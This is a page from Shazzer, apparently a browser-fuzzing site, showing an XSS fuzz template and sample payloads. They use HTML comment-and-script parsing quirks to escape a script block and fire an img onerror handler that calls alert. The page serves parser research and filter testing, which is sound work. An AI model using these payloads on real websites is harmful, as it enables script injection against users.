Fuzzing weird script behaviour after script text

This demonstrates that Shazzer now allows you to fuzz script tags.

Created Jul 18, 2024

Updated May 27, 2025

Detecting browser...

CategoryHTML Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<script>0x0D
x = "<!--<script$[chr]>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=log($[i])>"></div>

Sample payloads

<script>0x0D
x = "<!--<script0x09>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(9)>"></div>

<script>0x0D
x = "<!--<script
>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(10)>"></div>

<script>0x0D
x = "<!--<script0x0C>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(12)>"></div>

<script>0x0D
x = "<!--<script0x0D>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(13)>"></div>

<script>0x0D
x = "<!--<script >"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(32)>"></div>

<script>0x0D
x = "<!--<script/>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(47)>"></div>

<script>0x0D
x = "<!--<script>>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(62)>"></div>